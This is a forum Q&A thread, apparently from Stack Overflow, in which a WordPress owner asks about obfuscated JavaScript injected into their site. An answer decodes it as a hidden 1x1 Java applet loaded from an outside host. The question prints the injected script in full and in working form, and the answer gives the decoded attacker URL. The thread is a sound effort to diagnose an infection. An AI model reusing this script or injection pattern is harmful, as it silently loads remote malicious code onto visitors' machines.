# What does this javascript code doing?

Tags: javascript

Can someone explain what the below javascript code does? I keep getting it on my Wordpress site and the variables keep changing on different computers. Not sure if it is a hack of some sort.

```
<script language="javascript">
var vgdck = function(mzsrpv, hysza, yzmii, apcmch){
    var xru = function(zzu) {
        var szg, i;
        var fge="";
        for (i = 0; i < zzu.length; ++i) {
            szg =zzu.charCodeAt(i);
            szg = szg- 1;
            fge = fge + String.fromCharCode(szg);
        }
        return(fge);
    };

    var rnetl=document.createElement(xru("bqqmfu"));
    rnetl.setAttribute(xru("dpef"), xru(mzsrpv));
    rnetl.setAttribute(xru("bsdijwf"), xru("iuuq;00"+hysza));
    rnetl.setAttribute(xru("xjeui"), "1");
    rnetl.setAttribute(xru("ifjhiu"), "1");

    var rmjtth=document.createElement(xru("qbsbn"));
    rmjtth.setAttribute(xru("obnf"),xru(yzmii));
    rmjtth.setAttribute(xru("wbmvf"),xru(apcmch));
    rnetl.appendChild(rmjtth);
    document.body.appendChild(rnetl);
};

var ecfrc = vgdck;
ecfrc(
    "fenlscwulwvtkcri/okgseudbubiiusvzec/dmbtt",
    "3123/hjtsmt/jo01379",
    "vhmfgllmwqxfchlwqkgdkxd",
    "21c22gcd7d579cf4f3fb4663:2c624d3311248fgbc8758c72e7g5c41962gf169"
);
</script>
```

Comment: Obfuscated JS is usually not a good sign.

Comment: Probably just some crap your theme adds. Look for instances of `<script>` in your theme files

Comment: Your site is getting infected. You need to update Wordpress.

Comment: Thanks for the feedback. I'm new to using this site so excuse my noobness .. I wasnt sure if I should add a comment here or in the answer below. Doing both.. I upladed the theme file that maybe the issue to http://www.ge.tt/3bKfGNF/v/0?c. If you could glance over it and se eif anything stands out that would be much appreciated. Thanks.

Answer (score 2):

Something along the lines of the following...

```
applet
code
edmkrbvtkvusjbqh.njfrdtcatahhtruydb.class
archive
http://2012.gisrls.in/0268
width
height
param
name
uglefkklvpwebgkvpjfcjwc
value
10b11fbc6c468be3e2ea355291b513c2200137efab7647b61d6f4b30851fe058
```

Comment: Thanks for your quick replies. Much appreciated. The thing is that the code only seems to appear on one blog on the muliple blogs we have on that WP install. On that particular blog we just put a new theme that we had a third party create for us. Is it possible that the issue is caused becaue of the theme itself. I am not sure if the theme itself has any issue. I have uploaded the theme files here. If any you could glance at it and see if anything looks malicious that would be very helpful. Thanks.

Comment: Sorry forgot the link [link](http://www.ge.tt/3bKfGNF/v/0?c)

Comment: I don't think you'll find anyone who is going to read through all of those files but I opened up header.php and the last line is strange if nothing else. You can just open those up in any text editor (notepad) and start searching for any of the javascript above or strange obfuscated code like I mentioned about in header.php. Best of luck to you!

Comment: Ryan, Thanks for pointing out header.php. I have trying to go through it but was not able to tell which is good and which is bad. I will give it a shot though for anything similar to the code you mentioned. Appreciate your help.